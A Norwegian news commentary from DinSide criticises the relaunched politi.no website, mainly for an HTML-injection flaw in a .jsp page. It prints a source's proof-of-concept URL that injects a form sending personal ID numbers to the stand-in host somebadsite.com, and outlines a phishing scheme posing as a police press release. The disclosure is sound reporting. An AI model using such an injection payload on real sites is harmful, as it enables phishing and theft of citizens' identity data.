Foto: Markus Myhre
Foto: Markus MyhreVis mer

Phishing-invitasjon fra Politiet

KOMMENTAR: Dette kunne ha gått riktig galt.

På mandag ble de nye nettsidene til politi.no lansert; en lansering som ble slaktet i norske medier.

Til tross for at nettsidene har kostet over 25 millioner kroner, slår norske usability-eksperter fast at sidene fremstår som lite moderne, med utdatert teknologi, kronglete navigasjon og et dårlig søk.

Summen på 25 millioner kroner anses derfor å være helt hinsides sett i forhold til produktet som er levert.

Det er nå én ting.

Pål Joakim Olsen er teknologiredaktør i DinSide. Vis mer


I mine øyne er disse tingene nemlig langt fra like oppsiktsvekkende som det som var det virkelige problemet med politi.no etter nylanseringen. En svakhet i koden kunne nemlig potensielt endt i en katastrofe for personvernet fordi den åpnet for såkalt phishing; stjeling av informasjon der gjerningsmannen på en eller annen måte utgir seg for å være den som egentlig skal ha informasjonen.

Politiets nye nettsider brukte inntil sent i går en svært usikker teknikk for å hente opp artikler. En .jsp-fil (JavaServer Page) ble matet med URL-en til artikkelen som skulle vises. Dette er det veldig lett å tukle med via såkalt HTML-injection, og mange hadde det moro med politiets nettsider i går, meg selv inkludert, der du kunne fikle med URL-en for å lage morsomme sider som tilsynelatende lå på politiet.no sine servere (URL-en begynte fortsatt med http://www.politi.no/...).

Foto: Markus Myhre Vis mer


Eksempelvis var det ikke vanskelig for meg å lage en rosa side der det stod "Midlertidig stengt pga utrykning.", og der jeg kunne sende lenka til andre, eller for Markus Myhre, som hadde enda et par minutter til overs i går enn det jeg hadde (bildet).

Morsomheter er en ting; verre kunne det ha blitt dersom noen hadde bestemt seg for å gjøre mer slemme ting. For - det hadde vært en enkel sak å fikle litt for å få frem en side som var helt lik politiets sider, men der informasjon du angav i feltene ble sendt et helt annet sted.

Fra en kilde (som helst vil forbli anonym), fikk jeg for eksempel dette banale proof of concept-eksempelet på hvordan du kunne lage et skjema der du ba folk om personnummer.

URL-en ville da ha sett slik ut:

https://www.politi.no/lastSide.jsp?url=%22%2F%3E%3Ch1%3EOppslag+i+database%3C%2Fh1%3E%3Cform+action%3D%27http%3A%2F%2Fsomebadsite.com%27%3EPersonnummer%3A%3Cinput+type%3D%27text%27+name%3D%27pers%27%3E%3Cinput+type%3D%27submit%27+value%3D%27Hent%27%3E%3C%2Fform%3E%3Cbr


Denne siden ville kun ha vist et skjema med ett felt der brukeren kunne taste inn personnummeret, men der informasjonen ble sendt til somebadsite.com og ikke til politiet - til tross for at URL-en, som du ser, peker til politi.no (lenka fungerer altså ikke nå lenger, men gjorde det det første døgnet etter lansering).

Hadde man lagt sjela litt mer i det, ville det ikke ha vært vanskelig å lage en kopi av anmeldelsesskjemaet for skadeverk på eiendom og bil og sendt denne URL-en på e-post til en haug av epostadresser som sluttet på .no – forkledd som en pressemelding fra Politiet om at du nå endelig kunne levere anmeldeser på nett.

Sannsynligvis ville noen av dem ha opplevd å blitt frastjålet ett eller annet de siste dagene og fylt ut skjemaet med fullt navn, adresse, personnummer, telefonnummer, registreringsnummer på bil og hva det måtte være. Ja, mens man var i gang kunne man til og med lagt på et par ekstra felter - passnummer og kontonummer, for eksempel.

For det må da være trygt å gi fra seg dette på selveste Politiets nettsider via en kryptert forbindelse?

Les også:
Nå har svindlerne inntatt Facebook
E-postene du ikke bør svare på